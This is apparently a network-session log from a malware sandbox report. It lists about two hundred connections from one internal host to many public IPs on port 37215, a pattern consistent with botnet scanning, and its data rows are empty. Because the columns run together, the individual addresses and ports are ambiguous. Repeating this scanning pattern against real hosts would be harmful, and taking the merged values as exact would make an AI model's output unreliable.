                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7619192.168.2.1351754197.165.236.10037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7620192.168.2.133626073.177.112.22837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7621192.168.2.1351192197.54.111.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7622192.168.2.1350966197.242.11.14637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7623192.168.2.1336150157.158.174.13637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7624192.168.2.1336278157.72.218.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7625192.168.2.1357740197.91.144.20637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7626192.168.2.1345122197.242.131.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7627192.168.2.1342710157.100.149.16537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7628192.168.2.1358210197.6.29.22837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7629192.168.2.1336076133.191.71.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7630192.168.2.134838841.11.108.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7631192.168.2.134163841.162.71.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7632192.168.2.133796241.84.96.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7633192.168.2.133979441.107.12.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7634192.168.2.1353274190.195.0.16437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7635192.168.2.1344692157.83.138.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7636192.168.2.133871641.217.104.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7637192.168.2.1339654197.201.44.2437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7638192.168.2.1336630182.195.53.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7639192.168.2.1334512185.5.40.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7640192.168.2.1351076197.249.129.10037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7641192.168.2.1343630197.205.44.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7642192.168.2.134944441.1.53.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7643192.168.2.1341126157.96.237.2737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7644192.168.2.135022441.162.230.18737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7645192.168.2.135549041.205.69.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7646192.168.2.1355496218.214.85.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7647192.168.2.1333796157.15.146.13137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7648192.168.2.1358784115.38.25.5137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7649192.168.2.134729841.183.44.3837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7650192.168.2.1353768136.67.102.23437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7651192.168.2.1339912197.215.15.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7652192.168.2.1334034197.206.181.14837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7653192.168.2.1344444197.88.84.337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7654192.168.2.1354164157.13.15.21237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7655192.168.2.135894441.37.123.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7656192.168.2.1336846197.42.232.18037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7657192.168.2.1338590157.72.173.2737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7658192.168.2.1356636157.245.119.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7659192.168.2.135700041.171.78.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7660192.168.2.1336114197.163.85.19737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7661192.168.2.135966841.156.255.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7662192.168.2.1333962197.106.114.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7663192.168.2.1336896177.164.8.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7664192.168.2.1358726197.52.37.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7665192.168.2.133689641.252.202.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7666192.168.2.1351372197.139.155.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7667192.168.2.1349440197.245.107.15237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7668192.168.2.1346876157.20.185.25337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7669192.168.2.135027241.233.47.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7670192.168.2.133829249.39.22.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7671192.168.2.1344018197.108.183.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7672192.168.2.1360884197.198.31.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7673192.168.2.135799241.85.117.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7674192.168.2.1343686197.220.97.20337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7675192.168.2.1346364197.253.169.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7676192.168.2.1341060107.155.167.14837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7677192.168.2.1348416157.59.132.13137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7678192.168.2.1348522110.16.102.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7679192.168.2.1342924197.95.245.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7680192.168.2.1355448157.156.170.337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7681192.168.2.1335536157.84.218.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7682192.168.2.1332972155.47.77.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7683192.168.2.1358288197.125.34.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7684192.168.2.1335612197.151.98.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7685192.168.2.135349241.210.123.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7686192.168.2.134581864.136.217.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7687192.168.2.134872641.243.231.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7688192.168.2.1353372157.176.164.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7689192.168.2.1339856157.135.203.3337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7690192.168.2.135123241.18.79.18737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7691192.168.2.133711041.125.73.18737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7692192.168.2.136085041.10.64.25537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7693192.168.2.1337682197.85.100.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7694192.168.2.1340562157.249.203.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7695192.168.2.133682841.58.130.20437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7696192.168.2.1336916197.238.58.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7697192.168.2.1343632176.105.23.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7698192.168.2.1353866212.206.112.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7699192.168.2.1348926202.59.60.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7700192.168.2.135262441.160.57.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7701192.168.2.1345422157.195.116.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7702192.168.2.1357516157.171.122.3337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7703192.168.2.1347916157.148.91.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7704192.168.2.135207641.97.97.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7705192.168.2.1340962157.11.27.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7706192.168.2.1352518162.155.67.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7707192.168.2.135467241.236.151.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7708192.168.2.135099441.152.230.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7709192.168.2.133305841.80.211.9737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7710192.168.2.1356328157.198.250.9237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7711192.168.2.1339214197.133.245.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7712192.168.2.1355582157.57.89.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7713192.168.2.1358426197.198.52.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7714192.168.2.1353948197.207.229.2737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7715192.168.2.1354182212.138.90.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7716192.168.2.1334386157.51.18.137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7717192.168.2.1333092197.169.71.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7718192.168.2.135097836.245.74.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7719192.168.2.1349446191.168.13.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7720192.168.2.135502841.139.98.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7721192.168.2.134344679.78.177.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7722192.168.2.1355104157.15.222.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7723192.168.2.1353182157.2.248.25137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7724192.168.2.1357260197.198.250.4237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7725192.168.2.1335802197.90.185.14637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7726192.168.2.134313441.148.63.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7727192.168.2.1340780198.38.68.15237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7728192.168.2.1347316157.148.83.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7729192.168.2.1342548157.102.212.10037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7730192.168.2.1339332197.208.75.21237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7731192.168.2.1352068197.244.215.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7732192.168.2.135764279.73.70.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7733192.168.2.134856872.69.118.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7734192.168.2.1334564139.38.238.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7735192.168.2.1339288197.160.235.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7736192.168.2.1352968197.185.144.24937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7737192.168.2.134696641.65.170.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7738192.168.2.133398841.97.133.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7739192.168.2.1347704157.141.207.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7740192.168.2.133902041.162.31.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7741192.168.2.1336656157.164.223.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7742192.168.2.1355360131.124.152.9737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7743192.168.2.1338788157.105.234.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7744192.168.2.1340830157.221.22.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7745192.168.2.1337492155.247.164.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7746192.168.2.1357650157.174.129.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7747192.168.2.1358380157.166.221.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7748192.168.2.1345430197.144.205.2437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7749192.168.2.1333474197.192.119.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7750192.168.2.1336742101.62.226.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7751192.168.2.1360880221.121.219.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7752192.168.2.135293241.196.197.6937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7753192.168.2.1356260157.182.238.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7754192.168.2.1338294157.24.6.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7755192.168.2.13405228.179.99.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7756192.168.2.1337714197.146.24.6337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7757192.168.2.134939441.164.159.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7758192.168.2.135650288.106.203.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7759192.168.2.1333582143.101.16.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7760192.168.2.1353178157.158.71.15237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7761192.168.2.1357356197.158.48.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7762192.168.2.1349902152.175.248.24937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7763192.168.2.1340464157.211.106.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7764192.168.2.1334356197.43.35.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7765192.168.2.1334072197.191.226.9737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7766192.168.2.1357498197.221.242.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7767192.168.2.1349262197.167.40.5537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7768192.168.2.1358350154.193.248.18737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7769192.168.2.1345000142.95.140.14937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7770192.168.2.1337158116.229.134.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7771192.168.2.1349918157.15.232.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7772192.168.2.1335960208.165.236.137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7773192.168.2.1334140157.123.133.337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7774192.168.2.133933285.3.170.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7775192.168.2.134637841.176.55.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7776192.168.2.1348068171.104.78.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7777192.168.2.135337841.83.97.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7778192.168.2.134568841.246.11.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7779192.168.2.133403441.9.72.13337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7780192.168.2.1340510157.197.9.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7781192.168.2.134546041.118.116.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7782192.168.2.133584441.188.38.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7783192.168.2.133804044.127.40.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7784192.168.2.1359740197.15.180.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7785192.168.2.1348904135.137.124.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7786192.168.2.135229678.52.173.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7787192.168.2.1354666197.1.66.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7788192.168.2.1349040157.74.237.21037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7789192.168.2.1336962147.121.84.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7790192.168.2.1339154157.196.237.21137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7791192.168.2.134161832.54.149.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7792192.168.2.1339306142.251.27.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7793192.168.2.135191041.146.52.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7794192.168.2.134496041.24.173.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7795192.168.2.1346530197.10.25.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7796192.168.2.135994441.210.208.9337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7797192.168.2.1354552155.183.147.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7798192.168.2.1343152157.215.118.10037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7799192.168.2.1354980157.195.122.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7800192.168.2.135559841.8.85.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7801192.168.2.1344510157.188.226.16137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7802192.168.2.1349160197.33.204.6937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7803192.168.2.1335138136.159.182.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7804192.168.2.1337490160.231.101.18237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7805192.168.2.1337112197.206.180.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7806192.168.2.1347564157.158.41.20437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7807192.168.2.1333158167.48.18.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7808192.168.2.1338730104.165.179.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7809192.168.2.134911441.205.134.16437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7810192.168.2.135915641.8.116.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7811192.168.2.1336822221.217.238.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7812192.168.2.1334558157.140.241.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7813192.168.2.135784641.40.230.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7814192.168.2.1351530157.117.15.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7815192.168.2.133684817.1.206.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7816192.168.2.136009874.240.62.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7817192.168.2.1357506197.11.239.2237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7818192.168.2.1347164133.10.161.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7819192.168.2.134128641.68.117.25137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7820192.168.2.135647841.127.77.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7821192.168.2.134937241.204.156.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7822192.168.2.1346746197.101.231.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7823192.168.2.1351356197.136.249.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7824192.168.2.135709241.136.13.10037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7825192.168.2.1343114197.173.8.18737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7826192.168.2.1342316157.38.58.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7827192.168.2.1338358157.203.146.3037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
